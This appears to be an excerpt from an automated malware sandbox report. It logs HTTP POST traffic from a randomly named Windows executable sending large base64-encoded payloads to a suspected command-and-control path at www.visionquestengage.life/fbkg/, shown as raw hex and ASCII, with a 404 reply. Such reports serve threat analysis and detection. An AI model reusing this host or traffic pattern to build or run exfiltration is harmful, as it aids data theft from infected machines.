                                                                                                                                                                                                Data Ascii: RhoCrblGIV+zT/OiFNDVBD+lITVn3wVmdQPJuu1DdACP3blBbPPg3BW1uXT6QQfrcDPMySDVl2vRtVE0EucLon4mK3I+9TY873XaFBa3Ovd9KKhpQ5WbTYcJfPW22TSpmJuM3+3uF2Mf3pQobwQ1eBTt8NUCaa0a+mc+CwxLikSDOpN/PbDnZxUiXHOD/gG1ll3nSftNMoguokYfF2mBDWQ8pwXoymc28o3dBGEMXFxtNI+XZ3U
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789350033 CET690OUTData Raw: 67 4d 77 7a 4c 36 41 35 41 55 68 6a 5a 6a 65 2b 70 37 4b 56 2b 74 69 67 6b 69 4e 53 49 6a 73 35 30 46 48 44 4d 34 57 32 6c 55 65 78 74 47 30 79 73 59 75 56 65 59 4d 34 68 78 2b 35 76 56 2b 78 65 4d 66 44 41 4d 69 47 30 38 6a 68 7a 69 68 78 78 32
                                                                                                                                                                                                Data Ascii: gMwzL6A5AUhjZje+p7KV+tigkiNSIjs50FHDM4W2lUextG0ysYuVeYM4hx+5vV+xeMfDAMiG08jhzihxx2xzoXi2qj37seecEsYl7teaSOvAoZc37obEIDiuwZRJMh5PywR8FXNV7UIuV/2W/PTvuF0TroPdfs+zeGseT0hFXD02jIKrUocB4RL4ke4SzQfTamN+SbEszxvCqG8AuQkmpb3cIIdl+L2GiugLN1KQNtr8BxiCLBh
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789450884 CET696OUTData Raw: 46 4b 5a 6e 44 77 6a 71 76 52 31 50 30 42 35 30 49 4f 68 4a 5a 55 7a 53 6c 56 45 46 73 62 70 58 49 68 72 6a 32 6b 6d 4d 36 31 34 42 42 43 4b 6e 36 70 43 59 66 5a 79 70 35 52 6e 42 69 72 75 5a 73 32 67 57 47 45 6c 32 34 42 79 62 52 4c 64 65 70 38
                                                                                                                                                                                                Data Ascii: FKZnDwjqvR1P0B50IOhJZUzSlVEFsbpXIhrj2kmM614BBCKn6pCYfZyp5RnBiruZs2gWGEl24BybRLdep8nsD4PLxcx8d2XjCegeSVwWkER1j1UIVo0l0RcyzhgQ36GqxTvzJwWbEFCCX2Qt+WWEnQSxTMdMNTPFHeCJq8N3DQ/WecCvQFAUZkVr84Vx2C5IE/6dS0Uw/3QMiCkDFS4YHzFg2nqw8X7jLXLBd/PnUL7evtcWi1u
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789964914 CET701OUTData Raw: 41 32 4c 70 6c 4a 61 6b 6f 49 44 65 46 67 6c 31 38 76 43 4b 58 6d 76 6e 68 63 41 63 56 6c 46 4d 6e 74 68 61 2f 6b 63 30 4f 6e 44 4b 46 42 47 45 2f 6b 63 43 65 45 6a 61 6b 34 35 7a 76 53 69 39 30 69 6a 51 35 44 73 77 76 59 4f 61 51 43 73 69 62 35
                                                                                                                                                                                                Data Ascii: A2LplJakoIDeFgl18vCKXmvnhcAcVlFMntha/kc0OnDKFBGE/kcCeEjak45zvSi90ijQ5DswvYOaQCsib57BrcQsnj/5oq8r/zaGl85uxvnK+l2GA5yFnt855UYNVb5Kg5JdzjLIs0/K9etTiy/4z2I3ZRqcJqn59A5izUS/1TQI+UBYs3Jza4I4SmB/rhz3LGWT2fLqnQk2ohgb3dfk5EVIlJMa1auKw1Iq2n8n6SQVbqgD5HV
                                                                                                                                                                                                Nov 17, 2023 19:29:37.790080070 CET704OUTData Raw: 36 4e 43 30 4f 4e 73 72 35 6c 66 65 51 6d 72 36 72 78 38 51 31 51 66 45 41 43 43 45 6b 6c 7a 78 77 44 6e 49 73 35 74 5a 6d 6b 31 70 4b 4e 43 41 46 54 2f 6b 48 32 67 37 5a 50 6b 78 39 4b 58 79 65 4c 68 6c 77 4d 59 57 73 33 31 4a 4c 4f 30 2b 74 70
                                                                                                                                                                                                Data Ascii: 6NC0ONsr5lfeQmr6rx8Q1QfEACCEklzxwDnIs5tZmk1pKNCAFT/kH2g7ZPkx9KXyeLhlwMYWs31JLO0+tpVDbdLbKbf0Rrt8WYI0GCUOjnOurUByNhZdxQcYqR+1YJHEOurfht2n037RRl80mZqU+yvgaztIqZP6CNbaBgCHhop/6XeB2dCnhF3opYKaREXoxchazo0PVFX6w/5jHNrhSjxhIitxhSLY+LOzBwq9JVggkywyNXI
                                                                                                                                                                                                Nov 17, 2023 19:29:37.791007996 CET706OUTData Raw: 72 79 6f 4b 43 31 67 67 43 37 6a 30 44 55 74 77 6e 50 33 2b 38 57 67 65 62 6a 63 34 54 6f 4a 62 37 4e 61 36 74 4f 45 76 70 35 65 72 42 5a 6f 44 50 63 41 4e 49 50 48 43 4e 7a 58 6d 46 50 50 46 73 77 78 6d 62 46 69 50 73 37 34 78 41 52 62 4c 6e 2f
                                                                                                                                                                                                Data Ascii: ryoKC1ggC7j0DUtwnP3+8Wgebjc4ToJb7Na6tOEvp5erBZoDPcANIPHCNzXmFPPFswxmbFiPs74xARbLn/5NT9cv/HdCox5KV3C2WSSCxf4EsJFvGO812CaHHYuLLAV/dMz+HYw7czFEwERUJO9+8dmEev2Xe+LqDUvV3aUXpjwtunL1B/ImoYI3/ZX4+ePj0wkoD9su9DP6X3xAY5Ixl82O7yBgejbUYwSG10VINa0zgkb3vWT
                                                                                                                                                                                                Nov 17, 2023 19:29:37.960114956 CET721OUTData Raw: 4f 45 66 30 66 77 58 50 35 58 72 44 61 71 57 57 72 7a 30 58 68 73 43 45 36 47 75 31 70 4a 57 33 52 67 4c 62 70 4e 53 42 30 37 42 4e 78 4e 79 2f 61 54 6e 77 35 4c 49 32 36 79 65 6a 56 2b 34 39 78 64 63 76 79 61 44 45 72 49 7a 63 78 6f 70 35 4c 6c
                                                                                                                                                                                                Data Ascii: OEf0fwXP5XrDaqWWrz0XhsCE6Gu1pJW3RgLbpNSB07BNxNy/aTnw5LI26yejV+49xdcvyaDErIzcxop5LlSllxnHg+gxyMSN4V09rVLE8eqPFfDj71dZ/gNHmX5ANLIu1IJVuqTLRAZM8ynnt+BBZEzuA9IQQFoEQ9QyvuWrMwedJRn4la986qhDe0n5TAia5B+9ENg2Ik6IPbBhyuX+SvepnN5fFr3flcnbLWDpe6+xWSr6PsA
                                                                                                                                                                                                Nov 17, 2023 19:29:38.275218964 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:37 GMT
                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                29198.177.123.10680192.168.11.2050156C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:37.618518114 CET680OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.visionquestengage.life
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.visionquestengage.life
                                                                                                                                                                                                Referer: http://www.visionquestengage.life/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 6b 31 32 51 68 6f 4c 7a 6a 63 6d 4e 69 56 59 75 41 32 52 56 66 6e 38 74 5a 41 7a 56 66 33 68 79 7a 7a 68 74 2b 39 4b 59 54 53 78 61 4a 39 74 64 6e 71 45 77 74 79 62 57 51 64 37 33 45 53 34 36 4a 78 67 66 34 75 6d 74 33 79 47 4a 5a 35 44 39 6c 42 4e 4e 4e 53 36 65 52 75 39 62 51 69 31 7a 75 75 72 37 44 45 6c 78 39 36 32 4e 42 69 77 66 59 45 67 62 4b 78 62 41 38 77 72 6e 73 44 30 4f 33 6a 77 43 2f 48 62 78 5a 57 35 78 6e 34 74 70 4d 30 7a 66 63 70 44 76 2b 58 76 41 35 66 31 58 77 58 38 45 6a 30 58 53 59 6b 44 58 66 68 59 32 6d 43 2b 42 67 51 47 52 56 63 71 41 43 51 58 77 36 6f 72 41 4c 35 48 49 79 6f 43 41 4e 6c 6f 6b 6d 6c 4a 6b 38 71 58 43 37 56 32 2f 5a 45 2f 5a 4a 36 68 4b 31 67 50 34 59 78 73 4a 65 72 65 36 41 6d 76 65 73 45 4e 46 34 50 74 4e 41 44 32 63 50 66 52 7a 46 39 6f 44 74 6a 52 6b 6b 52 6f 4f 71 59 67 61 61 46 69 6b 73 31 66 32 5a 78 6a 58 32 37 59 33 4f 34 47 35 31 65 69 6a 65 35 77 73 75 6a 45 35 55 66 57 63 59 64 5a 4b 69 49 2b 57 74 77 57 6a 36 6c 32 43 6e 33 48 68 75 69 75 6d 51 4b 31 6b 72 35 34 72 34 63 44 36 78 55 4f 51 7a 74 56 65 48 42 48 55 45 4a 69 45 48 6f 53 73 30 6a 37 42 38 64 71 43 6f 48 39 6c 44 48 6a 7a 42 4d 70 36 41 4d 43 74 30 49 56 2f 30 44 39 56 67 37 66 76 33 47 32 69 53 49 51 74 61 61 56 32 55 35 31 34 38 77 64 55 2b 57 34 73 58 5a 6f 72 70 64 64 39 77 34 31 33 61 57 51 5a 41 78 52 36 65 54 32 79 36 4b 7a 55 78 37 45 38 71 73 6c 4a 32 57 6b 4b 57 50 68 6f 65 72 45 71 36 54 7a 56 59 52 6b 47 74 47 74 77 48 4e 6b 50 35 6c 42 46 55 50 4f 2b 38 57 38 6b 6b 71 55 42 46 76 4b 75 37 39 4b 6c 61 2b 53 74 7a 4e 6a 38 67 41 46 31 65 75 63 70 39 7a 5a 6f 2b 64 4f 6a 6d 36 6c 31 33 71 38 39 74 32 6d 35 45 6d 67 74 4d 5a 64 66 71 2f 72 77 67 77 56 41 79 56 79 6b 35 31 6e 62 66 39 66 54 35 33 34 32 6d 44 69 6f 52 62 4b 4c 49 49 44 61 6d 41 58 56 6e 55 44 6b 7a 6b 66 36 52 38 71 74 6b 49 72 67 4c 74 4e 31 7a 35 44 2b 50 58 4f 5a 2f 6b 39 57 72 7a 45 33 58 69 71 45 4a 63 63 48 74 51 72 6d 44 36 64 66 4c 34 77 6e 52 57 38 46 41 59 6b 2b 6e 41 6e 79 4c 4d 32 37 33 33 2f 42 76 41 53 50 74 44 72 6f 6c 59 36 79 75 53 64 69 58 64 36 6f 67 77 50 34 37 4b 54 35 66 36 4b 67 48 35 75 49 66 62 39 6e 51 4d 6f 6b 34 4e 48 7a 41 67 4a 75 77 49 71 72 73 50 2b 67 65 4c 48 4c 74 38 39 58 59 67 53 6d 46 56 42 58 72 30 64 72 7a 32 52 4f 7a 6a 78 5a 6d 39 4d 6d 63 52 31 4b 2f 78 55 46 75 39 67 5a 62 56 44 6e 43 36 61 6c 4f 6a 32 79 69 6c 31 55 47 56 71 6b 49 32 48 4c 64 44 77 79 6c 61 67 37 71 6a 62 5a 63 6c 4a 45 57 59 38 4c 4c 4c 70 54 48 6e 32 68 4c 76 75 73 6a 62 4c 65 7a 59 50 56 67 62 36 55 34 68 46 67 43 43 36 67 44 38 73 30 70 30 58 48 4b 61 6a 4f 4b 2b 4a 50 6d 2b 5a 42 77 59 64 6b 65 33 65 31 45 42 49 63 67 53 45 45 50 70 71 4c 78 57 30 58 37 6c 4f 75 69 52 30 56 4b 45 42 4d 6b 5a 49 6a 47 36 69 46 4e 33 68 6f 71 66 6b 38 65 56 65 69 68 2f 6f 70 6a 43 38 30 38 4c 34 47 34 33 78 71 65 61 4d 78 46 4f 48 62 64 6d 6d 79 4b 58 58 41 38 69 73 58 76 31 35 57 39 76 38 62 73 6a 37 58 59 48 64 4d 52 55 63 63 63 75 46 69 4e 34 6c 54 2f 48 6d 47 53 71 59 46 59 77 76 41 53 72 64 2f 4f 39 7a 79 4e 75 77 42 70 31 45 34 55 66 76 52 43 48 53 43 5a 75 6e 67 36 56 45 2b 69 62 72 70 35 52 66 70 6f 61 64 56 4b 67 66 42 43 6e 64 74 4e 45 64 36 34 4c 49 57 73 56 62 79 72 36 7a 47 35 69 6b 6d 43 38 4d 63 6b 54 78 6d 73 64 63 4c 42 45 33 47 37 6a 79 68 59 5a 31 6d 7a 7a 57 30 5a 4d 58 43 62 34 2b 78 69 64 50 2f 37 39 71 73 4f 31 59 63 50 43 6a 54 33 63 53 64 33 48 7a 70 34 47 6e 47 47 63 48 56 71 49 39 63 53 74 34 33 65 77 71 64 39 59 45 73 53 59 6c 50 79 2f 4b 49 38 30 38 6c 61 49 79 33 6d 55 61 47 4a 72 44 71 6c 6a 4e 65 66 74 6d 36 45 64 78 59 36 4e 46 33 30 48 6c 6e 63 4e 5a 64 41 32 4c 76 44 39 70 48 50 34 79 6e 44 70 68 6b 6d 51 47 6c 32 7a 4e 4e 57 2f 58 65 46 54 61 43 61 6c 47 73 6d 6c 56 48 54 6e 7a 72 45 43 53 4a 66 53 57 4e 74 4c 54 51 35 36 38 47 4d 4c 74 61 4a 37 66 59 63 42 57 55 2b 6f 34 38 6d 38 53 45 49 6a 56 79 6c 50 76 52 2f 56 4c 50 66 34 49 49 4f 59 72 42 54 56 68 74 69 6c 36 76 56 6a 78 37 4c 59 56 2f 30 61 58 39 59 74 57 6b 77 50 4c 37 75 78 61 64 6d 76 4b 50 58 6e 43 68 6b 70 4d 49 35 6e
                                                                                                                                                                                                Data Ascii: T6I=Ck12QhoLzjcmNiVYuA2RVfn8tZAzVf3hyzzht+9KYTSxaJ9tdnqEwtybWQd73ES46Jxgf4umt3yGJZ5D9lBNNNS6eRu9bQi1zuur7DElx962NBiwfYEgbKxbA8wrnsD0O3jwC/HbxZW5xn4tpM0zfcpDv+XvA5f1XwX8Ej0XSYkDXfhY2mC+BgQGRVcqACQXw6orAL5HIyoCANlokmlJk8qXC7V2/ZE/ZJ6hK1gP4YxsJere6AmvesENF4PtNAD2cPfRzF9oDtjRkkRoOqYgaaFiks1f2ZxjX27Y3O4G51eije5wsujE5UfWcYdZKiI+WtwWj6l2Cn3HhuiumQK1kr54r4cD6xUOQztVeHBHUEJiEHoSs0j7B8dqCoH9lDHjzBMp6AMCt0IV/0D9Vg7fv3G2iSIQtaaV2U5148wdU+W4sXZorpdd9w413aWQZAxR6eT2y6KzUx7E8qslJ2WkKWPhoerEq6TzVYRkGtGtwHNkP5lBFUPO+8W8kkqUBFvKu79Kla+StzNj8gAF1eucp9zZo+dOjm6l13q89t2m5EmgtMZdfq/rwgwVAyVyk51nbf9fT5342mDioRbKLIIDamAXVnUDkzkf6R8qtkIrgLtN1z5D+PXOZ/k9WrzE3XiqEJccHtQrmD6dfL4wnRW8FAYk+nAnyLM2733/BvASPtDrolY6yuSdiXd6ogwP47KT5f6KgH5uIfb9nQMok4NHzAgJuwIqrsP+geLHLt89XYgSmFVBXr0drz2ROzjxZm9MmcR1K/xUFu9gZbVDnC6alOj2yil1UGVqkI2HLdDwylag7qjbZclJEWY8LLLpTHn2hLvusjbLezYPVgb6U4hFgCC6gD8s0p0XHKajOK+JPm+ZBwYdke3e1EBIcgSEEPpqLxW0X7lOuiR0VKEBMkZIjG6iFN3hoqfk8eVeih/opjC808L4G43xqeaMxFOHbdmmyKXXA8isXv15W9v8bsj7XYHdMRUcccuFiN4lT/HmGSqYFYwvASrd/O9zyNuwBp1E4UfvRCHSCZung6VE+ibrp5RfpoadVKgfBCndtNEd64LIWsVbyr6zG5ikmC8MckTxmsdcLBE3G7jyhYZ1mzzW0ZMXCb4+xidP/79qsO1YcPCjT3cSd3Hzp4GnGGcHVqI9cSt43ewqd9YEsSYlPy/KI808laIy3mUaGJrDqljNeftm6EdxY6NF30HlncNZdA2LvD9pHP4ynDphkmQGl2zNNW/XeFTaCalGsmlVHTnzrECSJfSWNtLTQ568GMLtaJ7fYcBWU+o48m8SEIjVylPvR/VLPf4IIOYrBTVhtil6vVjx7LYV/0aX9YtWkwPL7uxadmvKPXnChkpMI5nQl87QH3WhkjpLMKchkDsAhGDrddVtVychXZ4+aRcZd1VJwRCZzX3fV4sELRAXR86GtDY1MCbX62bUnZYyz8HO7nn/tNWMHKItTh6NOSDRdaU4cpIMr/4d3XNMrKJ7orrNsmChKpSO1AhkUqcNngeFgKZctpQBW/Ky36pF8WgCoMa69YimmauUr8fS1VyDtYOW9vA0HClIfSd8WRmW0zQo23ek1MzFt3XDM6bh5ugFSP3nwbZ5HPPecVwXjQX/lawapzXPvFTR8mYOK43ChcGrD5e6uWfH/whIok1iXbuIjo3KIjMktBuKEIK0f7ocrhTRiLXWdwraupHWsM+mH9qY3BV8lxMhXiR2fBR1ceR2pLeXnovw/iBk5xB51QlxYxS/c1H4hu09VXq0JTbYAKD7IiR3Hn9r68Swnb6x8m6TEMOOMh4TGUeVEJLYE4cfi4YZKR2MjaJjkKjGoHCVZMs9aNiz5R1bCtPUktqbzaUNIHMAI4R7TcsGWItWwD2gfbILzw7oBhWeWwy8oCs67QCJTeYbEqjwig8U9z+zO99hdG2HF8VNUbL/+ruEv6sqTothnwCe0OR9rLysYfOt0Rr8IzoXfSw0QiS2qYzGQxkCOGvuc0CpipyogTsuaVRp0mG5T8mW0fru+P8rXo6PpIpm49y+kI9dv4/ieJ1E+ZCjxejFjQmgYqLes8+FF20LtFYwqKPpsp2VKNa0oFI4zmaWBv0pbtEvFPb6fpXUWmalgT39wRMGQlCjh0JFQAlTMjS/d5qAfBbS9vvwVYPSnpmWelAgtuvUWF5ZyvkoMzPuVr2yNk9at1eR+CGiW4Hyj+jYW8GbHIOAHoWy/hDb60Fk/7D0J2ylYo77cWxmbXwLKOEv+AD1HAZIQXYDafXWCSpUi6yxfxILtEfDOJxZFJq4tfyxBBGFs6xwMC49yN9FIq3ZtZj+CMa/OUDytAXQA7UQLbvl145FcSc3qT0jy0aeMUdaID55TrgGVmUM0/iPp/bgPiNCdw4PjX91wDy+lpc5icbDWzZQtFMKVVAHSujuyYIaj2rvA1/Y/EotOP4xa99Yx0kWa/jfIdg7uvsG3CTyUKqO4YClUpNLlxNjZUYPOwwvnU6rOzDIZNkK2NoEozukso9+KpO3ZToFY6BLusjTOJBS4Keo5x8MTx/OUWohrd/QEmq+GOtoZHdnccKBVlMQ0OpqLNXvg/pmH/+CJnBfMjvhDd83Y+EBfWRJDQq2ZKcrOZrWCqVOc7D75gVWYuk1+/mmaS8bbdRz5tc7bdcvBuJ9V1zYh/aXf/97web5t7zXC+8fjwei6zUF+aynFyTELmhPjuqr8plgF0+o7FL3U85ey9//B5PRmDA6LGfKRdfqMFfBYJU//An1vUokbmkhmBhAcbV8RqMaTNW3ktsL1+L1VmrFegJUYNiPBYLBAkXDEdrQZasZwruddf1oZOEZ6r2aHZS3xzR47AupwR0b6jJP9uBjw2nfDHcTtRLPhbtA+c4C48r2D3Gn73TqpHsNsA2oN8JuDvjfy/fVtaTN8B8Wv0jz5nX3ojqbtZXmEToE4ETk5IgoiFn4O0dA6c1YFInnqozlYeOmW8LR30n/lyMcoFvPcI5M2Qr1RtVmhMtwz3hLkI1eALrzte16nCzhpKrkU7DDrJLjOGgBuPZEZYexr7JRk/OuLQqpxFoiZVuOpUSPNvJJX9b5Lj3QI1Hwrl1zbH6wGRTbDjY7R/tbTZcr2UPY2+3Eloru9J/LomvgUqjF2YBHHCjRraP49rCYoi6w/yFZsGYz+nLXtwZXbFRwBevaRjgprYRgzzQH27cw4BaL67YRhT+W1pHsKZj0+TeiV49z7e+kQlozrkyN39ZrFYDnDeMHp9wk2xjUdEJUY0M1Ghf0iUBcts05Cu33sNSaro8ikawjLbg9Lo75Of4jE44kZBLCAOMbeAp+Ghibbd4f+zPqA7+Bvx10OXPAXpfSTSTSW5wBj9A3NT3ldY1CvgRGTZXIKq32LSDdlQ7GyxXuXC4VZRTUMNy/1diBzDY3Bjhj+a4Yi6L3au8i20upWVE2fIxFcLIeSz9Dx7euRbGGgvoNMXLEP28GhQqXLEG89U1lIhhfjecPrbxS2JXInErDe2WKdD+e8o0C0A4egHImcyEgdrvNsSePhC8zSbGhZ7C547/Ja/tc/VtCGNVi74PW3h0hL7komxvJJiuUDVKYE9e8pF2yazdTdd3u2DqAlu4tU1IHrAwtdqx6kKBFVZffs2/7aUBsgeQ6vF+gbbhRRciCWaIdIm9U4TeockECBoVve9aYl7jm7FGe/xIG6cAULebJiE3oJSiKoddHwAWq6F3nO7loy+ANWjSFsO3fCCMNZZu/4ASsusI3OgPTMDan9E4522O2KpTKzEjYh+ug/sh+Yr8kVFNVfl1V4I3+x8qNgKX23zELsZ3ni7EzEoNIgqJGGiCERhlxnCcCXQMPhHK7A8C2frV7vyrXCjYtkbB3h3zPMPCyQsqv1OeKMMIsSR5H0ttbXysrRpPqJNXERfuhm3Y5L9m/GpkVVvMVHC3ZvWRRrd3zAHZU37iypH0HH/cvnscSK+lgpOR5fPzxXrMEYnZOUO0dcwoAX30QR2vnKNtwDu669eWGRPwj3qwFWTnlQfOOmvuLXFG1+UbVE4Zwr4kbmKFsRK+PxRkPBrTRueVpwqox8hnn0ExVi8G0D6yf5LEcyn+hLNv4kPktaBKoF9
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789163113 CET682OUTData Raw: 52 68 6f 43 72 62 6c 47 49 56 2b 7a 54 2f 4f 69 46 4e 44 56 42 44 2b 6c 49 54 56 6e 33 77 56 6d 64 51 50 4a 75 75 31 44 64 41 43 50 33 62 6c 42 62 50 50 67 33 42 57 31 75 58 54 36 51 51 66 72 63 44 50 4d 79 53 44 56 6c 32 76 52 74 56 45 30 45 75
                                                                                                                                                                                                Data Ascii: RhoCrblGIV+zT/OiFNDVBD+lITVn3wVmdQPJuu1DdACP3blBbPPg3BW1uXT6QQfrcDPMySDVl2vRtVE0EucLon4mK3I+9TY873XaFBa3Ovd9KKhpQ5WbTYcJfPW22TSpmJuM3+3uF2Mf3pQobwQ1eBTt8NUCaa0a+mc+CwxLikSDOpN/PbDnZxUiXHOD/gG1ll3nSftNMoguokYfF2mBDWQ8pwXoymc28o3dBGEMXFxtNI+XZ3U
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789350033 CET690OUTData Raw: 67 4d 77 7a 4c 36 41 35 41 55 68 6a 5a 6a 65 2b 70 37 4b 56 2b 74 69 67 6b 69 4e 53 49 6a 73 35 30 46 48 44 4d 34 57 32 6c 55 65 78 74 47 30 79 73 59 75 56 65 59 4d 34 68 78 2b 35 76 56 2b 78 65 4d 66 44 41 4d 69 47 30 38 6a 68 7a 69 68 78 78 32
                                                                                                                                                                                                Data Ascii: gMwzL6A5AUhjZje+p7KV+tigkiNSIjs50FHDM4W2lUextG0ysYuVeYM4hx+5vV+xeMfDAMiG08jhzihxx2xzoXi2qj37seecEsYl7teaSOvAoZc37obEIDiuwZRJMh5PywR8FXNV7UIuV/2W/PTvuF0TroPdfs+zeGseT0hFXD02jIKrUocB4RL4ke4SzQfTamN+SbEszxvCqG8AuQkmpb3cIIdl+L2GiugLN1KQNtr8BxiCLBh
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789450884 CET696OUTData Raw: 46 4b 5a 6e 44 77 6a 71 76 52 31 50 30 42 35 30 49 4f 68 4a 5a 55 7a 53 6c 56 45 46 73 62 70 58 49 68 72 6a 32 6b 6d 4d 36 31 34 42 42 43 4b 6e 36 70 43 59 66 5a 79 70 35 52 6e 42 69 72 75 5a 73 32 67 57 47 45 6c 32 34 42 79 62 52 4c 64 65 70 38
                                                                                                                                                                                                Data Ascii: FKZnDwjqvR1P0B50IOhJZUzSlVEFsbpXIhrj2kmM614BBCKn6pCYfZyp5RnBiruZs2gWGEl24BybRLdep8nsD4PLxcx8d2XjCegeSVwWkER1j1UIVo0l0RcyzhgQ36GqxTvzJwWbEFCCX2Qt+WWEnQSxTMdMNTPFHeCJq8N3DQ/WecCvQFAUZkVr84Vx2C5IE/6dS0Uw/3QMiCkDFS4YHzFg2nqw8X7jLXLBd/PnUL7evtcWi1u
                                                                                                                                                                                                Nov 17, 2023 19:29:37.789964914 CET701OUTData Raw: 41 32 4c 70 6c 4a 61 6b 6f 49 44 65 46 67 6c 31 38 76 43 4b 58 6d 76 6e 68 63 41 63 56 6c 46 4d 6e 74 68 61 2f 6b 63 30 4f 6e 44 4b 46 42 47 45 2f 6b 63 43 65 45 6a 61 6b 34 35 7a 76 53 69 39 30 69 6a 51 35 44 73 77 76 59 4f 61 51 43 73 69 62 35
                                                                                                                                                                                                Data Ascii: A2LplJakoIDeFgl18vCKXmvnhcAcVlFMntha/kc0OnDKFBGE/kcCeEjak45zvSi90ijQ5DswvYOaQCsib57BrcQsnj/5oq8r/zaGl85uxvnK+l2GA5yFnt855UYNVb5Kg5JdzjLIs0/K9etTiy/4z2I3ZRqcJqn59A5izUS/1TQI+UBYs3Jza4I4SmB/rhz3LGWT2fLqnQk2ohgb3dfk5EVIlJMa1auKw1Iq2n8n6SQVbqgD5HV
                                                                                                                                                                                                Nov 17, 2023 19:29:37.790080070 CET704OUTData Raw: 36 4e 43 30 4f 4e 73 72 35 6c 66 65 51 6d 72 36 72 78 38 51 31 51 66 45 41 43 43 45 6b 6c 7a 78 77 44 6e 49 73 35 74 5a 6d 6b 31 70 4b 4e 43 41 46 54 2f 6b 48 32 67 37 5a 50 6b 78 39 4b 58 79 65 4c 68 6c 77 4d 59 57 73 33 31 4a 4c 4f 30 2b 74 70
                                                                                                                                                                                                Data Ascii: 6NC0ONsr5lfeQmr6rx8Q1QfEACCEklzxwDnIs5tZmk1pKNCAFT/kH2g7ZPkx9KXyeLhlwMYWs31JLO0+tpVDbdLbKbf0Rrt8WYI0GCUOjnOurUByNhZdxQcYqR+1YJHEOurfht2n037RRl80mZqU+yvgaztIqZP6CNbaBgCHhop/6XeB2dCnhF3opYKaREXoxchazo0PVFX6w/5jHNrhSjxhIitxhSLY+LOzBwq9JVggkywyNXI
                                                                                                                                                                                                Nov 17, 2023 19:29:37.791007996 CET706OUTData Raw: 72 79 6f 4b 43 31 67 67 43 37 6a 30 44 55 74 77 6e 50 33 2b 38 57 67 65 62 6a 63 34 54 6f 4a 62 37 4e 61 36 74 4f 45 76 70 35 65 72 42 5a 6f 44 50 63 41 4e 49 50 48 43 4e 7a 58 6d 46 50 50 46 73 77 78 6d 62 46 69 50 73 37 34 78 41 52 62 4c 6e 2f
                                                                                                                                                                                                Data Ascii: ryoKC1ggC7j0DUtwnP3+8Wgebjc4ToJb7Na6tOEvp5erBZoDPcANIPHCNzXmFPPFswxmbFiPs74xARbLn/5NT9cv/HdCox5KV3C2WSSCxf4EsJFvGO812CaHHYuLLAV/dMz+HYw7czFEwERUJO9+8dmEev2Xe+LqDUvV3aUXpjwtunL1B/ImoYI3/ZX4+ePj0wkoD9su9DP6X3xAY5Ixl82O7yBgejbUYwSG10VINa0zgkb3vWT
